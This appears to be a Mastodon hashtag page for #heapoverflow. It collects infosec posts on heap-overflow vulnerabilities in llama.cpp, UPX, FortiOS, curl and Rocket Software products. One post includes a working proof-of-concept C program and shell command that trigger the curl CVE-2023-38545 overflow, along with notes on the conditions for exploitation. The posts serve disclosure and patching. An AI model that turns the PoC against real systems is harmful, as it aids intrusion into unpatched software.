fosstodon.org is one of the many independent Mastodon servers you can use to participate in the fediverse.
Fosstodon is an invite only Mastodon instance that is open to those who are interested in technology; particularly free & open source software. If you wish to join, contact us for an invite.

Administered by:

Server stats:

10K
active users

#heapoverflow

0 posts0 participants0 posts today
Hacker News<p>Heap-overflowing Llama.cpp to RCE</p><p><a href="https://retr0.blog/blog/llama-rpc-rce" rel="nofollow noopener noreferrer" translate="no" target="_blank"><span class="invisible">https://</span><span class="">retr0.blog/blog/llama-rpc-rce</span><span class="invisible"></span></a></p><p><a href="https://mastodon.social/tags/HackerNews" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>HackerNews</span></a> <a href="https://mastodon.social/tags/HeapOverflow" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>HeapOverflow</span></a> <a href="https://mastodon.social/tags/LlamaCpp" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>LlamaCpp</span></a> <a href="https://mastodon.social/tags/RCE" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>RCE</span></a> <a href="https://mastodon.social/tags/CyberSecurity" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>CyberSecurity</span></a> <a href="https://mastodon.social/tags/Exploit" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Exploit</span></a> <a href="https://mastodon.social/tags/TechNews" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>TechNews</span></a></p>
LavX News<p>Unraveling the Llama: A Deep Dive into Heap Exploitation in Llama.cpp</p><p>In a thrilling exploration of Llama.cpp's unique memory management, Patrick Peng unearths a heap overflow vulnerability that leads to remote code execution. This article decodes the intricate exploita...</p><p><a href="https://news.lavx.hu/article/unraveling-the-llama-a-deep-dive-into-heap-exploitation-in-llama-cpp" rel="nofollow noopener noreferrer" target="_blank"><span class="invisible">https://</span><span class="ellipsis">news.lavx.hu/article/unravelin</span><span class="invisible">g-the-llama-a-deep-dive-into-heap-exploitation-in-llama-cpp</span></a></p><p><a href="https://mastodon.cloud/tags/news" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>news</span></a> <a href="https://mastodon.cloud/tags/tech" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>tech</span></a> <a href="https://mastodon.cloud/tags/RemoteCodeExecution" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>RemoteCodeExecution</span></a> <a href="https://mastodon.cloud/tags/LlamaCpp" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>LlamaCpp</span></a> <a href="https://mastodon.cloud/tags/HeapOverflow" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>HeapOverflow</span></a></p>
🛡 H3lium@infosec.exchange/:~# :blinking_cursor:​<p><strong>Heap Buffer Overflow in UPX Identified</strong></p><p><strong>Date</strong>: March 26, 2024<br><strong>CVE</strong>: To be assigned<br><strong>Vulnerability Type</strong>: Buffer Errors<br><strong>CWE</strong>: [[CWE-122]]<br><strong>Sources</strong>: <a href="https://nvd.nist.gov/vuln/detail/CVE-2024-3209" rel="nofollow noopener noreferrer" target="_blank">NIST</a> <a href="https://vuldb.com/?ctiid.259055" rel="nofollow noopener noreferrer" target="_blank">VULNDB</a> <a href="https://vuldb.com/?submit.304575" rel="nofollow noopener noreferrer" target="_blank">VULNDB Submit</a></p><p><strong>Issue Summary</strong></p><p>A heap buffer overflow vulnerability was identified in the [[UPX|Ultimate Packer for eXecutables]] (UPX), specifically in the commit <code>06b0de9c77551cd4e856d453e094d8a0b6ef0d6d</code>. This issue occurs during the handling of certain data structures, leading to potential memory corruption. The vulnerability was discovered through fuzzing techniques using the Google OSS-Fuzz project.</p><p><strong>Technical Key findings</strong></p><p>The vulnerability is caused by improper handling of input data, resulting in a heap buffer overflow. This overflow occurs in the handling of packed files during decompression, where the bounds of allocated heap memory are not properly checked.</p><p><strong>Vulnerable products</strong></p><ul><li>[[UPX]] version identified by commit <code>06b0de9c77551cd4e856d453e094d8a0b6ef0d6d</code>.</li></ul><p><strong>Impact assessment</strong></p><p>An attacker could exploit this vulnerability to execute arbitrary code on the target system or cause a denial of service through application crash, potentially compromising the system's integrity and availability.</p><p><strong>Patches or workaround</strong></p><p>No specific patches or workarounds were mentioned at the time of reporting. Users are advised to monitor the official [[UPX]] GitHub repository for updates.</p><p><strong>Tags</strong></p><p><a href="https://infosec.exchange/tags/UPX" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>UPX</span></a> <a href="https://infosec.exchange/tags/BufferOverflow" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>BufferOverflow</span></a> <a href="https://infosec.exchange/tags/HeapOverflow" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>HeapOverflow</span></a> <a href="https://infosec.exchange/tags/SecurityVulnerability" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>SecurityVulnerability</span></a> <a href="https://infosec.exchange/tags/CVE" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>CVE</span></a></p>
Harry Sintonen<p>Here’s a quick proof of concept to reproduce the <a href="https://infosec.exchange/tags/curl" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>curl</span></a> <a href="https://infosec.exchange/tags/CVE202338545" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>CVE202338545</span></a> <a href="https://infosec.exchange/tags/heapoverflow" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>heapoverflow</span></a> <a href="https://infosec.exchange/tags/vulnerability" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>vulnerability</span></a>. This PoC expects localhost to run a <a href="https://infosec.exchange/tags/socks5" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>socks5</span></a> proxy:</p><p>gcc -xc -fsanitize=address - -lcurl &lt;&lt;EOF<br># include &lt;curl/curl.h&gt;<br># include &lt;string.h&gt;<br>int main(void)<br>{<br> CURL *curl = curl_easy_init();<br> if(curl) {<br> char url[32768];<br> memcpy(url, "https://", 8);<br> memset(url + 8, 'A', sizeof(url) - 8 - 1);<br> url[sizeof(url) - 1] = '\0';<br> curl_easy_setopt(curl, CURLOPT_URL, url);<br> (void)curl_easy_perform(curl);<br> curl_easy_cleanup(curl);<br> }<br> return 0;<br>}<br>EOF<br>https_proxy=socks5h://127.0.0.1 ./a.out</p><p>Some comments:<br>• Application must use socks5h proxy to be vulnerable (it can be via proxy env variables or by explicitly settings the proxy options inside the app).<br>• Application must either fetch the attacker provided URL or follow redirects controlled by the attacker.<br>• Exploitation is made slightly more complicated due to this being a heap buffer overflow (many libc have built-in heap sanity checks). On modern systems with address space layout randomization (ASLR) an additional information leak is likely required for successful exploitation.<br>• Certain combinations of libcurl, platform and/or application options are not affected. See the advisory at <a href="https://curl.se/docs/CVE-2023-38545.html" rel="nofollow noopener noreferrer" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">curl.se/docs/CVE-2023-38545.ht</span><span class="invisible">ml</span></a> for more details.</p><p><a href="https://infosec.exchange/tags/infosec" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>infosec</span></a></p>
Bishop Fox<p>We internally developed an <a href="https://infosec.exchange/tags/exploit" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>exploit</span></a> for <a href="https://infosec.exchange/tags/CVE" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>CVE</span></a>-2023-27997, a <a href="https://infosec.exchange/tags/heapoverflow" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>heapoverflow</span></a> in <a href="https://infosec.exchange/tags/FortiOS" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>FortiOS</span></a> (OS behind <a href="https://infosec.exchange/tags/FortiGate" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>FortiGate</span></a> firewalls) that allows <a href="https://infosec.exchange/tags/RCE" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>RCE</span></a>. 490,000 affected SSL VPN interfaces are exposed online &amp; about 69% of them are currently unpatched. Patch yours now. <a href="https://bfx.social/439HtF3" rel="nofollow noopener noreferrer" target="_blank"><span class="invisible">https://</span><span class="">bfx.social/439HtF3</span><span class="invisible"></span></a></p>
Ron Bowes<p>Just published a big pile of <a href="https://infosec.exchange/tags/research" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>research</span></a> I did this past winter! Protocol <a href="https://infosec.exchange/tags/reverseengineering" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>reverseengineering</span></a>, <a href="https://infosec.exchange/tags/heapoverflow" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>heapoverflow</span></a>, <a href="https://infosec.exchange/tags/stackoverflow" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>stackoverflow</span></a>, <a href="https://infosec.exchange/tags/authbypass" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>authbypass</span></a> - lots of cool stuff. If you think this sounds cool, be sure to check out my <a href="https://infosec.exchange/tags/NorthSec" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>NorthSec</span></a> talk in May :)</p><p>Here are some links:</p><ul><li>The blog post with all the details: <a href="https://www.rapid7.com/blog/post/2023/03/29/multiple-vulnerabilities-in-rocket-software-unirpc-server-fixed/" rel="nofollow noopener noreferrer" target="_blank"><span class="invisible">https://www.</span><span class="ellipsis">rapid7.com/blog/post/2023/03/2</span><span class="invisible">9/multiple-vulnerabilities-in-rocket-software-unirpc-server-fixed/</span></a></li><li>Implementation of their protocol (with PoC scripts): <a href="https://github.com/rbowes-r7/libneptune" rel="nofollow noopener noreferrer" target="_blank"><span class="invisible">https://</span><span class="ellipsis">github.com/rbowes-r7/libneptun</span><span class="invisible">e</span></a></li><li>Metasploit PR: <a href="https://github.com/rapid7/metasploit-framework/pull/17832" rel="nofollow noopener noreferrer" target="_blank"><span class="invisible">https://</span><span class="ellipsis">github.com/rapid7/metasploit-f</span><span class="invisible">ramework/pull/17832</span></a></li></ul><p>If you're running <a href="https://infosec.exchange/tags/RocketSoftware" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>RocketSoftware</span></a>'s UniData or UniVerse suites, which are usually a back-end thing, you need to patch ASAP!</p>
Astra Kernel :verified:<p>For <a href="https://infosec.exchange/tags/HeapOverflow" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>HeapOverflow</span></a> it is not writing the vulnerable code 😲🤔</p><p><a href="https://infosec.exchange/tags/infosec" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>infosec</span></a> <a href="https://infosec.exchange/tags/chatgpt" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>chatgpt</span></a> <a href="https://infosec.exchange/tags/openai" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>openai</span></a></p>
ITSEC News<p>Apple Patches Two iOS Zero-Days Abused for Years - Researchers revealed two zero-day security vulnerabilities affecting Apple's stock Mail app on iOS... more: <a href="https://threatpost.com/apple-patches-two-ios-zero-days-abused-for-years/155042/" rel="nofollow noopener noreferrer" target="_blank"><span class="invisible">https://</span><span class="ellipsis">threatpost.com/apple-patches-t</span><span class="invisible">wo-ios-zero-days-abused-for-years/155042/</span></a> <a href="https://schleuss.online/tags/vulnerabilities" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>vulnerabilities</span></a> <a href="https://schleuss.online/tags/heapoverflow" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>heapoverflow</span></a> <a href="https://schleuss.online/tags/ioszeroday" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>ioszeroday</span></a> <a href="https://schleuss.online/tags/ios13" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>ios13</span></a>.4.5 <a href="https://schleuss.online/tags/iphone" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>iphone</span></a> <a href="https://schleuss.online/tags/hacks" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>hacks</span></a> <a href="https://schleuss.online/tags/ipad" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>ipad</span></a></p>